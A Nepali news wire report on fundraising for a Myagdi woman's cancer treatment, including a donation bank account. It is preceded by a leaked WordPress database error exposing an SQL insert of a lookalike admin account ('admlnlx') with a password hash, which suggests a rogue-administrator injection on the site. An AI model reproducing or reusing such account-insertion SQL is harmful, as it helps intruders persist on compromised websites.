WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuNT9ID4vUp4fG5oHj2SVtEUuGNAx21', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:22:57', '', 'admlnlx', 'admlnlx')
म्याग्दी, माघ ४ –
म्याग्दीको भगवती–३ की बोनम्यारो र रक्तक्यान्सरबाट पीडित सीता ९कृष्णकुमारी० कटुवाल क्षेत्रीको उपचारका लागि रु ३५ लाख सहयोग सङ्कलन भएको छ ।
उपचारमा लाखौँ रुपैयाँ आवश्यक पर्ने भएपछि सुरु गरिएको सीता ९कृष्णकुमारी० कटुवाल क्षेत्री बचाउ अभियानमा स्वदेश तथा विदेशमा रहेका राखुवासी र म्याग्देलीको पहलमा उक्त सहयोग जुटेको हो ।
गत पुस ६ गतेदेखि सुरु गरिएको सीता बचाउ अभियानअन्तर्गत सङ्कलित रकममार्फत पीडित क्षेत्रीको उपचार भइरहेको छ । करिब एक महिनादेखि टिचिङ अस्पताल काठमाडौँमा उपचार गराइएकी क्षेत्रीलाई बोनम्यारो प्रत्यारोपणका लागि थप उपचार गर्न अहिले भारतको नयाँ दिल्लीमा रहेको इन्दिरा गान्धी अस्पतालमा भर्ना गरिएको छ ।
बोनम्यारो र रक्तक्यान्सरको उपचारमा न्यूनतम रु ७० लाखभन्दा बढी खर्च लाग्ने भएपछि उनको सहयोगार्थ स्वदेश तथा विदेशमा रहेका राखुवासी र म्याग्देलीले सहयोग जुटाइरहेको अभियानका संयोजक नन्दबहादुर खत्रीले जानकारी दिनुभयो ।
क्षेत्रीको सहयोगार्थ गठित सीता बचाउ अभियान समितिले क्षेत्रीको सहयोगार्थ बेनीस्थित ग्लोबल आइएमई बैँकमा समितिका संयोजक नन्दबहादुर खत्री र सदस्यद्वय कमल खत्री र हरि भण्डारीको नाममा रहेको संयुक्त खाता नम्बर ४८०७०१०००२६७४ मा सहयोग रकम जम्मा गर्न सक्ने व्यबस्था मिलाएको जनाएको छ । – रासस